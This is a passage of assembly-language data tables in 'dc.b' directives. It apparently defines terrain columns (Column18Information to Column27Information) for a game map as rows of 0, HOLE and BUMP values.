dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 160-141 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE Column18Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE ; 60-41 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE ; 80-61 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 100-81 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 120-101 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 160-141 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE Column19Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE ; 60-41 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE ; 80-61 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE ; 100-81 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 120-101 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b BUMP dc.b BUMP dc.b BUMP dc.b BUMP dc.b BUMP dc.b BUMP dc.b BUMP dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 160-141 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column20Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE ; 60-41 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 80-61 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE ; 100-81 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 120-101 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b 0 dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 160-141 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column21Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 60-41 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 80-61 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE ; 100-81 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 120-101 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 160-141 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column22Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 60-41 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 80-61 dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE ; 100-81 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 120-101 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 160-141 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column23Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 60-41 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE ; 80-61 dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b HOLE ; 100-81 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 120-101 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b BUMP dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 160-141 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column24Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 60-41 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE ; 80-61 dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b HOLE ; 100-81 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 120-101 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 160-141 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column25Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 60-41 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 80-61 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 100-81 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 120-101 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 160-141 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column26Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 60-41 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 ; 80-61 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 100-81 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 120-101 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 160-141 dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column27Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b 